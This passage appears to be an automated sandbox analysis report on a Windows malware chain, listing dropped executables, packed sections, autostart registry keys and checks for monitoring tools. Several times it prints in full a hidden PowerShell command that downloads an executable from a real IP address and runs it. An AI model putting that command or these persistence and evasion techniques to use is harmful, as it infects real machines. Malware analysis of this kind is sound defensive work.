                                                Source: 5ef8bafe70.exe.16.drStatic PE information: section name: pramlbdq
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: section name: .taggant
                                                Source: random[2].exe1.16.drStatic PE information: section name:
                                                Source: random[2].exe1.16.drStatic PE information: section name: .idata
                                                Source: random[2].exe1.16.drStatic PE information: section name:
                                                Source: random[2].exe1.16.drStatic PE information: section name: kxuwrjnk
                                                Source: random[2].exe1.16.drStatic PE information: section name: ykrabclo
                                                Source: random[2].exe1.16.drStatic PE information: section name: .taggant
                                                Source: df2fea7261.exe.16.drStatic PE information: section name:
                                                Source: df2fea7261.exe.16.drStatic PE information: section name: .idata
                                                Source: df2fea7261.exe.16.drStatic PE information: section name:
                                                Source: df2fea7261.exe.16.drStatic PE information: section name: kxuwrjnk
                                                Source: df2fea7261.exe.16.drStatic PE information: section name: ykrabclo
                                                Source: df2fea7261.exe.16.drStatic PE information: section name: .taggant
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name:
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name: .idata
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name:
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name: yuxfscdw
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name: oiahzgmh
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name: .taggant
                                                Source: vertualiziren.exe.22.drStatic PE information: section name:
                                                Source: vertualiziren.exe.22.drStatic PE information: section name: .idata
                                                Source: vertualiziren.exe.22.drStatic PE information: section name:
                                                Source: vertualiziren.exe.22.drStatic PE information: section name: yuxfscdw
                                                Source: vertualiziren.exe.22.drStatic PE information: section name: oiahzgmh
                                                Source: vertualiziren.exe.22.drStatic PE information: section name: .taggant
                                                Source: freebl3.dll.23.drStatic PE information: section name: .00cfg
                                                Source: freebl3[1].dll.23.drStatic PE information: section name: .00cfg
                                                Source: mozglue.dll.23.drStatic PE information: section name: .00cfg
                                                Source: mozglue[1].dll.23.drStatic PE information: section name: .00cfg
                                                Source: msvcp140.dll.23.drStatic PE information: section name: .didat
                                                Source: msvcp140[1].dll.23.drStatic PE information: section name: .didat
                                                Source: nss3.dll.23.drStatic PE information: section name: .00cfg
                                                Source: nss3[1].dll.23.drStatic PE information: section name: .00cfg
                                                Source: softokn3.dll.23.drStatic PE information: section name: .00cfg
                                                Source: softokn3[1].dll.23.drStatic PE information: section name: .00cfg
                                                Source: benskvi.exe.24.drStatic PE information: section name:
                                                Source: benskvi.exe.24.drStatic PE information: section name: .idata
                                                Source: benskvi.exe.24.drStatic PE information: section name:
                                                Source: benskvi.exe.24.drStatic PE information: section name: yuxfscdw
                                                Source: benskvi.exe.24.drStatic PE information: section name: oiahzgmh
                                                Source: benskvi.exe.24.drStatic PE information: section name: .taggant
                                                Source: freebl3[1].dll.25.drStatic PE information: section name: .00cfg
                                                Source: mozglue[1].dll.25.drStatic PE information: section name: .00cfg
                                                Source: msvcp140[1].dll.25.drStatic PE information: section name: .didat
                                                Source: nss3[1].dll.25.drStatic PE information: section name: .00cfg
                                                Source: softokn3[1].dll.25.drStatic PE information: section name: .00cfg
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name:
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name: .idata
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name:
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name: vbshiqxp
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name: ijdsmmzx
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name: .taggant
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name:
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name: .idata
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name:
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name: vbshiqxp
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name: ijdsmmzx
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name: .taggant
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name:
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name: .idata
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name:
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name: vbshiqxp
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name: ijdsmmzx
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name: .taggant
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C322CB push ds; ret 0_2_00C322E2
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C30A76 push ecx; ret 0_2_00C30A89
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFE7B6100BD pushad ; iretd 9_2_00007FFE7B6100C1
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BDA063 push ecx; ret 20_2_00BDA076
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BC72EF pushad ; iretd 20_2_00BC72F0
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CDA063 push ecx; ret 21_2_00CDA076
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CC72EF pushad ; iretd 21_2_00CC72F0
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name: entropy: 7.985706217582851
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name: vbshiqxp entropy: 7.954050962212733
                                                Source: rapes.exe.11.drStatic PE information: section name: entropy: 7.985706217582851
                                                Source: rapes.exe.11.drStatic PE information: section name: vbshiqxp entropy: 7.954050962212733
                                                Source: random[1].exe.16.drStatic PE information: section name: yououbtf entropy: 7.955647133047136
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: section name: yououbtf entropy: 7.955647133047136
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name: hbloxsmk entropy: 7.954850446877664
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name: hbloxsmk entropy: 7.954850446877664
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name: hbloxsmk entropy: 7.954850446877664
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name: hbloxsmk entropy: 7.954850446877664
                                                Source: random[2].exe.16.drStatic PE information: section name: pqifeagr entropy: 7.924844514638534
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: section name: pqifeagr entropy: 7.924844514638534
                                                Source: random[2].exe0.16.drStatic PE information: section name: entropy: 7.9832192045568915
                                                Source: random[2].exe0.16.drStatic PE information: section name: qqigmylm entropy: 7.954610158423588
                                                Source: f0b421a199.exe.16.drStatic PE information: section name: entropy: 7.9832192045568915
                                                Source: f0b421a199.exe.16.drStatic PE information: section name: qqigmylm entropy: 7.954610158423588
                                                Source: random[1].exe1.16.drStatic PE information: section name: entropy: 7.219744895023223
                                                Source: c105f06ef0.exe.16.drStatic PE information: section name: entropy: 7.219744895023223
                                                Source: random[3].exe.16.drStatic PE information: section name: hjgvekwy entropy: 7.953730765891355
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: section name: hjgvekwy entropy: 7.953730765891355
                                                Source: random[2].exe1.16.drStatic PE information: section name: kxuwrjnk entropy: 7.951935613026697
                                                Source: df2fea7261.exe.16.drStatic PE information: section name: kxuwrjnk entropy: 7.951935613026697
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name: entropy: 7.799208910449233
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name: yuxfscdw entropy: 7.952071105223017
                                                Source: vertualiziren.exe.22.drStatic PE information: section name: entropy: 7.799208910449233
                                                Source: vertualiziren.exe.22.drStatic PE information: section name: yuxfscdw entropy: 7.952071105223017
                                                Source: benskvi.exe.24.drStatic PE information: section name: entropy: 7.799208910449233
                                                Source: benskvi.exe.24.drStatic PE information: section name: yuxfscdw entropy: 7.952071105223017
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name: entropy: 7.985706217582851
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name: vbshiqxp entropy: 7.954050962212733
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name: entropy: 7.985706217582851
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name: vbshiqxp entropy: 7.954050962212733
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name: entropy: 7.985706217582851
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name: vbshiqxp entropy: 7.954050962212733
                                                Source: random[1].exe0.16.dr, GSKpiUyewQVjl3ll2g.csHigh entropy of concatenated method names: 'N64lIWiqvs', 'y3qlLpN8VK', 'ahKlWAIBS3', 'TF7lOb8J3f', 'jgnloPbgcx', 'ra2lnByEPY', 'Gbml9SnirQ', 'XAylfpE7m9', 'wwNljlVFDW', 'qAplaZYBVp'
                                                Source: random[1].exe0.16.dr, gBMthepoZSL1ZVKpeA.csHigh entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'NsqrSNUpN', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
                                                Source: acd63ce6fe.exe.16.dr, GSKpiUyewQVjl3ll2g.csHigh entropy of concatenated method names: 'N64lIWiqvs', 'y3qlLpN8VK', 'ahKlWAIBS3', 'TF7lOb8J3f', 'jgnloPbgcx', 'ra2lnByEPY', 'Gbml9SnirQ', 'XAylfpE7m9', 'wwNljlVFDW', 'qAplaZYBVp'
                                                Source: acd63ce6fe.exe.16.dr, gBMthepoZSL1ZVKpeA.csHigh entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'NsqrSNUpN', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'

                                                Persistence and Installation Behavior

                                                barindex
                                                Tries to download and execute files (via powershell)
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeFile created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeJump to dropped file
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXEJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10111240101\c70962c806.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[2].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\softokn3[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\mozglue[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[1].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\softokn3[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\mozglue[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nss3[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10111230101\5ef8bafe70.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[2].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[1].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeFile created: C:\ProgramData\jnxnee\benskvi.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vertualiziren[1].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10111250101\df2fea7261.exeJump to dropped file
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\msvcp140[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[3].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\ILqcVeT[1].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nhDLtPT[1].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\vcruntime140[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nss3[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[3].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rXOl0pp[1].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10111210101\f0b421a199.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeFile created: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\freebl3[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\msvcp140[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\freebl3[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEFile created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeJump to dropped file
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10111200101\5a57aa51d3.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10111190101\acd63ce6fe.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[2].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10111220101\c105f06ef0.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\vcruntime140[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[1].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeFile created: C:\ProgramData\jnxnee\benskvi.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                                                Boot Survival

                                                barindex
                                                Creates multiple autostart registry keys
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 132fd7f0ed.exe
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
                                                Monitors registry run keys for changes
                                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEWindow searched: window name: FilemonClassJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEWindow searched: window name: RegmonClassJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEWindow searched: window name: FilemonClassJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEWindow searched: window name: FilemonClass
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEWindow searched: window name: PROCMON_WINDOW_CLASS
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEWindow searched: window name: RegmonClass
